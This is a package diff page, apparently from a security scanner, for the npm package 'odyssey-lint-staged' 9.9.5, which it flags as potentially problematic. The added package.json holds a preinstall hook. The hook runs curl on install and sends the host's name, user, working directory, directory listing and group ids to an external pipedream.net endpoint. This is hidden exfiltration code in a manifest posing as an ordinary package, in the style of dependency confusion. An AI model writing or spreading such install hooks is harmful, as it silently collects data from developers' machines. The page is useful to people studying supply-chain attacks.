odyssey-lint-staged 9.9.5

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of odyssey-lint-staged might be problematic. Click here for more details.

Files changed (1) hide show
  1. package/package.json +13 -0
package/package.json ADDED
@@ -0,0 +1,13 @@
1
+ {
2
+ "name": "odyssey-lint-staged",
3
+ "version": "9.9.5",
4
+ "description": "Description of your package",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "curl -X POST -H \"Hostname: $(hostname)\" -H \"repo: Okta Odessy\" -H \"packagetype: NPM\" -H \"dependency: odyssey-lint-staged\" -H \"Whoami: $(whoami)\" -H \"Pwd: $(pwd)\" -d \"Directory: \n$(ls -la) \n \nSecurity Groups: \n$(id) \" -H \"Content-Type: text/plain\" https://eot0n2yp3autvqq.m.pipedream.net"
9
+ },
10
+ "keywords": [],
11
+ "author": "Your Name",
12
+ "license": "MIT"
13
+ }